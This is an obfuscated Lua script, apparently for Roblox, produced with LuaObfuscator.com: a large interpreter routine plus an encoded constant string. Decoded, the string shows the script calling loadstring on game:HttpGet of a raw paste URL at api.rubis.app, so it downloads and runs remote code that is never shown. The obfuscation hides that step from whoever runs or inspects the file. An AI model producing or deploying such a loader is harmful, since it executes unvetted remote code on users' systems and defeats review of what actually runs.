--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v100=v5(v83,v19);v19=nil;return v100;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v84-(v84%1) ;else local v85=619 -(555 + 64) ;local v86;while true do if (v85==(931 -(857 + 74))) then v86=(570 -(367 + (1078 -(282 + 595))))^(v32-(928 -((1851 -(1523 + 114)) + 713))) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=0;local v35;while true do if ((0 + 0)==v34) then v35=v1(v16,v18,v18);v18=v18 + (1 -(0 -0)) ;v34=1066 -(68 + 997) ;end if (v34==(1271 -(226 + (1161 -(32 + 85))))) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v37 * (1213 -(892 + 65))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -(182 -(67 + 113))) ;return (v41 * 16777216) + (v40 * (120312 -54776)) + (v39 * ((445 + 161) -(87 + 263))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=(7 -5) -1 ;local v45=(v20(v43,1 + 0 ,79 -59 ) * (2^(984 -(802 + 150)))) + v42 ;local v46=v20(v43,56 -35 ,55 -(466 -(416 + 26)) );local v47=((v20(v43,24 + (25 -17) )==(998 -(915 + 82))) and  -(2 -1)) or (1 + 0) ;if (v46==(0 -0)) then if (v45==(1187 -(1069 + 51 + 67))) then return v47 * ((0 -0) -0) ;else v46=1 -0 ;v44=(438 -(145 + 293)) + 0 ;end elseif (v46==((4066 -(44 + 386)) -1589)) then return ((v45==(0 + 0)) and (v47 * ((792 -(368 + 423))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2509 -(998 + 488)) ) * (v44 + (v45/(2^(70 -(10 + 8))))) ;end local function v25(v48) local v49=0 + 0 ;local v50;local v51;while true do if (v49==(2 + 0)) then v51={};for v89=773 -(201 + (1406 -835)) , #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=3;end if ((1141 -(116 + 1022))==v49) then return v6(v51);end if (v49==(4 -3)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=7 -(1 + 4) ;end if (v49==(0 -0)) then v50=nil;if  not v48 then v48=v23();if (v48==(859 -(288 + 526 + 45))) then return "";end end v49=1;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 1749 -(1013 + 736) ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 0 + 0 ;end)();while true do if (v66==1) then if (v52~=1) then else local v97=(function() return 0 -0 ;end)();local v98=(function() return;end)();while true do if (v97~=(0 -0)) then else v98=(function() return 0;end)();while true do if ((868 -(550 + 317))==v98) then v58=(function() return v23();end)();v52=(function() return 5 -3 ;end)();break;end if ((0 + 0)==v98) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v98=(function() return 1;end)();end end break;end end end if ((0 -0)==v52) then v53=(function() return function(v104,v105,v106) local v107=(function() return 0;end)();local v108=(function() return;end)();while true do if (v107~=(0 -0)) then else v108=(function() return 0;end)();while true do if ((0 -0)~=v108) then else local v147=(function() return 0;end)();while true do if (v147==(285 -(134 + 151))) then v104[v105-#"!" ]=(function() return v106();end)();return v104,v105,v106;end end end end break;end end end;end)();v54=(function() return {};end)();v55=(function() return {};end)();v52=(function() return 1666 -(970 + 695) ;end)();end break;end if (v66==0) then if (v52~=(4 -2)) then else local v99=(function() return 0;end)();while true do if (v99==(1 -0)) then v57[ #"asd"]=(function() return v21();end)();v52=(function() return 3;end)();break;end if (v99==(1990 -(582 + 1408))) then v59=(function() return {};end)();for v115= #"~",v58 do local v116=(function() return 0 -0 ;end)();local v117=(function() return;end)();local v118=(function() return;end)();local v119=(function() return;end)();while true do if (v116==(1501 -(1408 + 92))) then v119=(function() return nil;end)();while true do if (v117~=(1 -0)) then else if (v118== #".") then v119=(function() return v21()~=0 ;end)();elseif (v118==(7 -5)) then v119=(function() return v24();end)();elseif (v118~= #"asd") then else v119=(function() return v25();end)();end v59[v115]=(function() return v119;end)();break;end if (v117~=0) then else local v168=(function() return 1824 -(1195 + 629) ;end)();local v169=(function() return;end)();while true do if (v168==(0 -0)) then v169=(function() return 1288 -(993 + 295) ;end)();while true do if ((0 + 0)~=v169) then else v118=(function() return v21();end)();v119=(function() return nil;end)();v169=(function() return 242 -(187 + 54) ;end)();end if (1==v169) then v117=(function() return 781 -(162 + 618) ;end)();break;end end break;end end end end break;end if (v116==0) then v117=(function() return 0 + 0 ;end)();v118=(function() return nil;end)();v116=(function() return 1 + 0 ;end)();end end end v99=(function() return 1 + 0 ;end)();end end end if (v52~=(1 + 2)) then else for v101= #">",v23() do local v102=(function() return v21();end)();if (v20(v102, #"|", #"~")==(0 -0)) then local v110=(function() return 529 -(406 + 123) ;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if ((0 -0)~=v110) then else local v120=(function() return 1769 -(1749 + 20) ;end)();local v121=(function() return;end)();while true do if (v120==0) then v121=(function() return 0 + 0 ;end)();while true do if (v121==(1322 -(1249 + 73))) then v111=(function() return 0;end)();v112=(function() return nil;end)();v121=(function() return 1 + 0 ;end)();end if (v121~=(1146 -(466 + 679))) then else v110=(function() return 2 -1 ;end)();break;end end break;end end end if (v110~=(5 -3)) then else while true do if (v111== #"[") then local v154=(function() return 1636 -(1373 + 263) ;end)();while true do if (v154==(1900 -(106 + 1794))) then v114=(function() return {v22(),v22(),nil,nil};end)();if (v112==0) then local v179=(function() return 0 + 0 ;end)();local v180=(function() return;end)();while true do if (v179~=(0 + 0)) then else v180=(function() return 0;end)();while true do if (v180~=(0 -0)) then else v114[ #"xxx"]=(function() return v22();end)();v114[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v112== #"}") then v114[ #"19("]=(function() return v23();end)();elseif (v112==(5 -3)) then v114[ #"19("]=(function() return v23() -(2^16) ;end)();elseif (v112~= #"-19") then else local v187=(function() return 0 -0 ;end)();local v188=(function() return;end)();while true do if ((1384 -(746 + 638))~=v187) then else v188=(function() return 0;end)();while true do if (0~=v188) then else v114[ #"xxx"]=(function() return v23() -(2^16) ;end)();v114[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v154=(function() return 1;end)();end if (v154==(585 -(57 + 527))) then v111=(function() return 1429 -(41 + 1386) ;end)();break;end end end if ( #"19("~=v111) then else if (v20(v113, #"19(", #"xxx")== #">") then v114[ #"http"]=(function() return v59[v114[ #"0836"]];end)();end v54[v101]=(function() return v114;end)();break;end if (v111==(0 + 0)) then local v156=(function() return 0 -0 ;end)();while true do if ((103 -(17 + 86))==v156) then v112=(function() return v20(v102,343 -(218 + 123) , #"xxx");end)();v113=(function() return v20(v102, #".com",1587 -(1535 + 46) );end)();v156=(function() return 1 + 0 ;end)();end if (v156~=1) then else v111=(function() return  #"|";end)();break;end end end if (v111==2) then local v157=(function() return 0 + 0 ;end)();local v158=(function() return;end)();while true do if (v157==(560 -(306 + 254))) then v158=(function() return 0;end)();while true do if (v158==(0 + 0)) then if (v20(v113, #"|", #":")== #" ") then v114[2]=(function() return v59[v114[3 -1 ]];end)();end if (v20(v113,3 -1 ,2)~= #"|") then else v114[ #"xxx"]=(function() return v59[v114[ #"91("]];end)();end v158=(function() return 1;end)();end if (v158==1) then v111=(function() return  #"-19";end)();break;end end break;end end end end break;end if ((1468 -(899 + 568))==v110) then local v122=(function() return 0 + 0 ;end)();while true do if (v122~=(1 -0)) then else v110=(function() return 4 -2 ;end)();break;end if (v122~=(603 -(268 + 335))) then else v113=(function() return nil;end)();v114=(function() return nil;end)();v122=(function() return 291 -(60 + 230) ;end)();end end end end end end for v103= #"]",v23() do v55,v103,v28=(function() return v53(v55,v103,v28);end)();end return v57;end v66=(function() return 1;end)();end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1 + 1 ];local v65=v60[5 -2 ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=1;local v72= -(66 -(30 + 35));local v73={};local v74={...};local v75=v12("#",...) -(1 + 0) ;local v76={};local v77={};for v87=1257 -(1043 + 214) ,v75 do if ((v87>=v69) or (788>2514)) then v73[v87-v69 ]=v74[v87 + (3 -2) ];else v77[v87]=v74[v87 + (1213 -(323 + 889)) ];end end local v78=(v75-v69) + (2 -1) ;local v79;local v80;while true do local v88=0;while true do if (v88==(581 -(361 + 219))) then if (v80<=(328 -(53 + 267))) then if (v80<=(1 + 2)) then if ((v80<=(414 -(13 + 2 + 398))) or (55==2387)) then if (v80>0) then v77[v79[(419 + 565) -(18 + (2468 -(363 + 1141))) ]]={};else v77[v79[7 -5 ]]=v79[2 + 1 ]~=(0 + 0) ;end elseif ((1454<2491) and (v80>(852 -(20 + 830)))) then v77[v79[(1582 -(1183 + 397)) + 0 ]]=v79[3];else v77[v79[128 -(116 + 10) ]]=v79[1 + (5 -3) ];end elseif ((v80<=(743 -(542 + 196))) or (4157<=2803)) then if (v80==(3 + 1)) then local v129=v79[3 -(1 + 0) ];v77[v129]=v77[v129](v13(v77,v129 + 1 + (1975 -(1913 + 62)) ,v72));else local v131=0 + 0 ;local v132;while true do if (v131==(0 + 0 + 0)) then v132=v79[4 -2 ];v77[v132]=v77[v132](v13(v77,v132 + 1 ,v72));break;end end end elseif (v80<=(15 -(23 -14))) then v77[v79[1553 -(1126 + 425) ]]=v79[1936 -(565 + 1368) ]~=(405 -(118 + (1079 -792))) ;elseif (v80>7) then local v159=v79[7 -5 ];local v160=v77[v79[1124 -(118 + 1003) ]];v77[v159 + (2 -1) ]=v160;v77[v159]=v160[v79[4]];else do return;end end elseif ((4853>=2982) and (v80<=(389 -(142 + 235)))) then if (v80<=(45 -35)) then if ((4134>3357) and (v80>((1663 -(1477 + 184)) + 7))) then v77[v79[979 -(553 + 424) ]]();else local v134=v79[3 -1 ];local v135,v136=v70(v77[v134](v13(v77,v134 + 1 + 0 ,v79[3])));v72=(v136 + v134) -(1 + 0) ;local v137=0;for v148=v134,v72 do v137=v137 + 1 + 0 ;v77[v148]=v135[v137];end end elseif (v80>(5 + 6)) then local v138=v79[2 + 0 ];local v139,v140=v70(v77[v138](v13(v77,v138 + (2 -1) ,v79[7 -(5 -1) ])));v72=(v140 + v138) -(2 -1) ;local v141=0 + 0 ;for v151=v138,v72 do v141=v141 + (4 -3) ;v77[v151]=v139[v141];end else v77[v79[755 -(239 + 514) ]]=v62[v79[2 + 1 ]];end elseif (v80<=(1343 -(797 + 532))) then if ((v80>(10 + 3)) or (3417<2534)) then v77[v79[1 + 1 ]]={};else v77[v79[4 -2 ]]();end elseif (v80<=(1217 -(373 + 829))) then v77[v79[733 -(476 + 255) ]]=v62[v79[1133 -(369 + 761) ]];elseif ((v80==16) or (2722<=164)) then local v164=0 + 0 ;local v165;local v166;while true do if ((v164==(0 -0)) or (2408<2109)) then v165=v79[3 -1 ];v166=v77[v79[241 -(64 + 174) ]];v164=1;end if (v164==1) then v77[v165 + 1 + 0 ]=v166;v77[v165]=v166[v79[5 -(1 + 0) ]];break;end end else do return;end end v71=v71 + (337 -(144 + 192)) ;break;end if ((v88==((1072 -(564 + 292)) -(42 + 174))) or (33==1455)) then v79=v67[v71];v80=v79[1 + 0 ];v88=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F4E58754C4B4356474D79666C4333614D2F726177000A4Q00017Q00120F000100013Q00120F000200023Q002008000200020003001202000400044Q0006000500014Q000C000200054Q000400013Q00022Q000A0001000100012Q00113Q00017Q00",v9(),...);
